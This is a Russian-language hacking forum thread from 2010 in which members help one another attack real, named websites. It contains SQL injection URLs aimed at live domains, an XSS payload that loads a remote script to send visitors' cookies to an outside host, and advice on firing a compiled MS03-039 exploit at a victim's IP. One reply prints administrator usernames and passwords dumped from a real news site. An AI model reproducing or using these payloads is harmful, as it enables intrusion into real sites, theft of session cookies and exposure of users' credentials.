Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    53
    Likes Received:
    64
    Reputations:
    10
    Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
    Если да - то как их искать?
     
  2. ccleverr

    ccleverr New Member

    Joined:
    25 Jan 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0

    Flash работает на клиенте (на компе, а не на сервере). Если ты хочешь попытаться "забраться" на сервер, то можно:

    - декомпилировать Flash или просто снять посылаемые запросы, чтоб посмотреть как коммуникация с сервером идет;

    - и потом в зависимости от того, какой клиент (PHP, JSP, ASP) на сервере попытаться найти уязвимость, из-/подменяя параметры/данные передаваемые Flash-Client'ом.
     
    1 person likes this.
  3. ccleverr

    ccleverr New Member

    Joined:
    25 Jan 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    JSP XSS взлом

    У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь...

    сайт: JSP (J2EE) (AJAX)
    сервер: Apache Tomcat 5.0.28 с Coyote Connector
    уязвимость: XSS, поле позволяет максимум 80 символов.

    конечная цель: добраться до данных BD (dump)

    пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные?*), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет.


    какой самый оптимальный способ воспользоваться.

    мои варианты:

    1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было.

    Code:
    <jsp:include page="{HttpServletRequest().getParameter("xx")}" />
    в хх подставил удаленный HTML. Чето не работает ((


    Что посоветуете?


    Update:

    * Нашел неплохой JSP File Browser
    http://www.vonloesch.de/jspbrowser.html
     
    #11003 ccleverr, 9 Jan 2010
    Last edited: 9 Jan 2010
  4. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    народ подскажите плз, как такое может быть
    Code:
    _ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
    Code:
    _ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    почему не подходит?
     
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    все подходит, выводи в 3 поле..и смотри сорец страницы
    Code:
    <title>Flash Game Studio : 4.0.27-standard</title>
     
    1 person likes this.
  6. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    ага выводит, а я на странице искал, сенкс :)
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    создай на своём хосте 1.js в него впиши
    PHP:
     img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
    ну и где ты там нашел xss впиши :

    PHP:
    <script src=http://site.ru/1.js></script> 
     
  8. Cry Wolf

    Cry Wolf New Member

    Joined:
    18 Jul 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.


    выглядит так:
    Code:
    /reset?char=Fate
    Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.

    Примерно так:

    Status On

    Name Fate

    Class Fairy Elf

    Level 1

    Resets 0

    PK Level Default

    Map Devias

    Strenght 22

    Agility 25

    Vitality 10

    Energy 15

    Code:
    /reset?char=Fate'[code] выводит ошибку БД соответсвенно, 
    
    та же ошибка [code]/char/Fate'
    та же в регестрации в поле e-mail.

    Code:
    char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1--
    дает вывод

    Status

    Name darkknight

    Class Dark Knight

    Level 1

    Resets 0

    PK Level Default

    Map Lorencia

    Strenght 18

    Agility 18

    Vitality 15

    Energy 30


    Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.

    Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.
     
    #11008 Cry Wolf, 9 Jan 2010
    Last edited: 9 Jan 2010
  9. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Code:
    http://www.100mat.ru/ubb/showthreaded.php?Cat=&Board=server&Number=1111+or+(select+count(*)+from+w3t_Posts+group+by+concat(version(),floor(rand(0)*2)))+--+
     
  10. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    хелп, подскажите плз, что-то не могу понять опять, подставлял во все столбцы, но что-то ничего не отображается.. ((
    пробовал кодировать/декодировать, шифровать.. но вродеж он и без этого должен цифры отображать нормально?
    пробовал хексить слово и потом по коду искать, но тоже ни как..
    Code:
    _ttp://www.asian ewsnet.net/news.php?id=-60+union+select+1,2,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    зы И еще на другом сайте пробую просмотреть таблицы, так показывает таблицу
    Code:
    ?id=-11+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
    но почему-то не могу к ней подключиться, ошибку пишет
    Code:
    ?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+tablename+--+
     
    #11010 Gidz, 9 Jan 2010
    Last edited: 10 Jan 2010
  11. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    маф

    туц
    [/QUOTE]
    Возможно скрипт работает с другой БД.Укажите в запросе имя БД
    Code:
    -11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+[B]database[/B].tablename+--+
    Имя базы данных:
    Code:
    -11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+

    Зы:Может не хватать прав на доступ
     
    #11012 S00pY, 10 Jan 2010
    Last edited: 10 Jan 2010
    3 people like this.
  12. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Намекните где можно почитать, как заюзать ms03-039 и есть ли он в метасплойте. Ато в мс я его не нашел (3,2), скачал скомпилированую версию, а как заюзать хз. В cmd выдает: usage 1.exe <target_ip>
    Что дальше?
     
  13. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    В cmd выдает: usage 1.exe <target_ip>
    Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
    example:1.exe 192.168.0.1
    Зы:Самого сплойта я не видел и насчет МС незнаю
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Gidz
    http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+1,1--
    administrator:0641
    http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+2,1--
    admin123:admin123

    http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserName,11,12,13,14,15,Password,17,18,19,20,21,22,23,24+from+tuser+limit+3,1--
    ann:bkk1854
    И так далее и тому подобное...
     
  15. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    delete
     
    #11016 Darren, 10 Jan 2010
    Last edited: 19 Feb 2010
  16. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Под кавычкой имееться в виду "<" ?
    Че-то не особо понятно :)
    зы:Моно попробовать iframe

    strip_tags() мб...
     
    #11017 S00pY, 10 Jan 2010
    Last edited: 10 Jan 2010
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?
     
  18. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Скидывай сюда переменные с полными занченями..мы попробуем сообразить как подключится.
     
    1 person likes this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Nightmarе:

    <td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

    только что проверил в последних OPERA, IE, в FF не запахало почему-то
     
    #11020 Pashkela, 10 Jan 2010
    Last edited: 10 Jan 2010
    2 people like this.
Thread Status:
Not open for further replies.